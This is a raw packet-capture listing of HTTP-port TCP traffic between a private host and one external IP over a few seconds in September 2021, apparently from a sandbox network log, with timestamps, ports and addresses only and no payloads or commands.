Sep 28, 2021 18:00:03.181812048 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.250837088 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.250871897 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.252329111 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.252732992 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.252756119 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.252780914 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.252779961 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.252803087 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.252824068 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.252825022 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.252835989 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.252844095 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.252846003 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.252847910 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.252851009 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.252854109 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.252866983 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.252877951 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.252882957 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.252887011 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.252907991 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.252907991 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.252928972 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.252954960 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.253536940 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.368693113 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.370384932 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.457987070 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458081961 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458084106 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458086014 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458086967 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458089113 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458091974 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458093882 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458096027 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458097935 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458100080 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458101034 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458102942 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458103895 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458106041 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458106995 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458108902 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458110094 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458112001 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458112955 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458115101 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458116055 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458117962 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.458120108 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.460874081 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.460902929 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.562000036 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.562088966 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.668217897 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.669656992 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.671175957 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.672195911 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.672662973 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.672684908 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.672703981 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.672727108 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.672749996 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.672775030 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.672799110 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.672821999 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.675586939 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.675614119 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.675620079 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.675622940 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.675626040 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.675628901 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.675632000 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.675635099 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.675637960 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.675641060 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.675642967 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.748009920 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.748795033 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.875931025 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.875972033 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.877456903 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.877507925 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.880363941 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.882435083 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.882452965 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.882461071 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.882500887 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.882527113 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.882530928 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.882555008 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.882581949 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.882605076 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.882631063 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.882656097 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.882663965 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.882679939 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.882692099 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.882705927 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.882709026 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.882733107 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.884141922 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.885545969 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.885562897 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.885565996 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.886941910 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.887661934 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.887665987 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.887670994 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.887675047 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.887676954 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.887680054 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.887681961 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.887687922 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.887759924 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.887789965 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.889188051 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.939348936 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.939449072 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.084620953 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.086086988 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.088145018 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.088171005 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.088177919 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.088193893 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.088202953 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.088207006 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.088210106 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.088216066 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.088238001 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.088248968 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.088253975 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.088259935 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.088280916 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.088283062 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.088300943 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.088304043 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.088321924 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.088325977 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.088342905 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.088351965 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.088360071 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.088391066 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.088808060 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.124614954 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.124898911 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.290370941 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290429115 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290462971 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290498018 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290560007 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290596008 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290611982 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.290633917 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290637016 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.290673018 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290704012 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290724993 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290745020 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290769100 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290791988 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290812969 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290833950 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290855885 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290875912 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290895939 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290915966 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290941000 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290963888 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.290985107 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.291007996 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.291032076 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.291471004 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.291845083 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.313400030 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.313632011 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.492055893 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.492094994 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.492319107 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.493521929 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.493551016 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.493575096 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.493601084 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.493623972 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.493642092 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.493664980 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.493686914 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.493710995 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.493712902 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.493726015 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.493729115 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.493731976 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.493735075 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.493736029 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.493752956 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.493772030 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.494064093 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.503109932 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.503319979 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.697879076 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.697930098 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.697962999 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.697984934 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.697993994 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698007107 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698020935 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698029995 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698038101 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698045969 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698056936 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698064089 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698086977 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698101997 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698110104 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698123932 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698134899 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698146105 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698153973 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698168039 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698172092 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698193073 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698194027 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698216915 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698218107 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698240042 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698249102 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698261023 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698270082 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698285103 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698286057 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698306084 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698307037 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698328018 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698328972 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698349953 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698352098 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698373079 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698378086 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698399067 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698400974 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698422909 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698431015 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698446035 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698450089 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698467970 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.698471069 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698491096 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.698509932 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.699604034 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.883764029 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.884047031 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.907454967 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.907603979 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.907629013 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.907659054 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.907684088 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.907706022 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.907756090 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.907757998 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.907783985 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.907788038 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.907788038 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.907792091 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.907812119 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.907819986 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.907838106 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.907846928 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.907860994 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.907872915 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.907881975 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.907897949 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:04.907932043 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.907948017 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:04.911855936 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.069061995 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.069283962 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.109540939 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109606028 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109638929 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109664917 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109699011 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109714985 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109735012 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109759092 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109777927 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109801054 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109826088 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109842062 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.109848976 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109870911 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.109870911 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109874964 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.109878063 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.109880924 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.109894037 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109898090 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.109915018 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109920025 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.109935999 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109958887 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.109978914 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.110003948 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.110025883 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.110048056 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.110070944 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.110093117 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.110116005 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.111854076 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.112339020 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.257533073 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.257929087 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.314583063 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.314814091 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.315151930 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315186024 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315210104 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315236092 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315259933 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315275908 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.315284967 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315295935 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.315310955 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315311909 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.315331936 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.315335989 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315359116 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:05.315360069 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315383911 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315408945 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315435886 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:05.315460920 CEST	80	49167	190.14.37.178	192.168.2.22
